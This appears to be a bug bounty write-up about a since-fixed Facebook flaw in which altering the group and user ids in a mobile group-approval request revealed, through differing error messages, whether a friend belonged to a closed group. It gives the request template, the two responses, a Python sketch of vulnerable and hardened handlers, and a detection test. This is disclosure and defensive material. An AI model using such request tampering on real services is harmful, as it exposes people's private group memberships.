Facebook Vulnerability: Expose Group Member — $3000


Muhammad S

The issue is an Insecure Direct Object Reference whose impact is that a malicious user can expose, or determine, who is a member of a closed group. The issue has a limitation: it works only if the member of the closed group and the attacker are friends. That is the reason the bounty is $3000. Without that limitation, where the attacker and victim have no friendship, the reward is $5000.

A person’s membership in a closed group is confidential. We only know who the admin is. But a person’s status can be identified by modifying the HTTP request sent via mtouch.facebook.com. The attacker first stores a request for joining a group he manages, then replaces that group with the target group. A person’s membership status is then revealed by the appearance of the error “Already a member”.

POST /a/group/?gid=GROUP_ID&aid=USER_ID&refid=18 HTTP/1.1
Host: mtouch.facebook.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
…..

confirm=Approve&m_sess=&fb_dtsg=
…..

Change “gid=” to the victim’s group_id.

“aid=” is the user_id of the person who will be checked for membership status.

If the person is not a member, the response will display:

for (;;);{"__ar":1,"error":1376045,"errorSummary":"Cannot add member","errorDescription":"You need to be an admin or a moderator of the group, or a friend of this person, to add them as a member.","payload":null,"bootloadable":{},"ixData":{},"bxData":{},"gkxData":{},"qexData":{},"lid":""}

But if the person is a member of the group, the response is:

for (;;);{"__ar":1,"error":1376015,"errorSummary":"Already a Member","errorDescription":"The person you’ve just tried to add is already a member of this group.","payload":null,"bootloadable":{},"ixData":{},"bxData":{},"gkxData":{},"qexData":{},"lid":""}
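The two responses above differ only because the membership test answers before the caller's rights over the requested group are checked. The sketch below is an added example, not Facebook's code: a hypothetical handler with that check ordering next to a hardened one, plus a test that detects the response discrepancy. All names, ids and error strings are assumptions, and the friendship condition is left out for brevity.

```python
from dataclasses import dataclass, field

@dataclass
class Group:
    admins: set = field(default_factory=set)
    members: set = field(default_factory=set)

# Constructed sample data: group ids and user names are made up.
GROUPS = {
    "g_attacker": Group(admins={"mallory"}, members={"mallory"}),
    "g_victim": Group(admins={"alice"}, members={"alice", "bob"}),
}

GENERIC_REFUSAL = {"error": "cannot_add_member"}  # one body for every refusal

def approve_vulnerable(actor, gid, aid):
    """Membership is tested before the actor's rights over this gid."""
    group = GROUPS[gid]
    if aid in group.members:
        return {"error": "already_a_member"}  # state leaks to any caller
    if actor not in group.admins:
        return {"error": "cannot_add_member"}
    group.members.add(aid)
    return {"ok": True}

def approve_hardened(actor, gid, aid):
    """Authorize against the gid in the request first, then refuse uniformly."""
    group = GROUPS.get(gid)
    if group is None or actor not in group.admins:
        return dict(GENERIC_REFUSAL)  # identical for members and non-members
    if aid in group.members:
        return {"error": "already_a_member"}  # only group admins reach this
    group.members.add(aid)
    return {"ok": True}

def leaks_membership(handler, actor, gid, member, non_member):
    """True if an unauthorized actor can tell the two cases apart."""
    return handler(actor, gid, member) != handler(actor, gid, non_member)
```

A regression test for this class of bug compares the full response (status, error code and body) for a known member and a known non-member, as seen by a caller with no rights over the group.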

26 May 2019: Report

30 May 2019: Request for more information

13 June 2019: They fixed my report

2 October 2019: Bounty
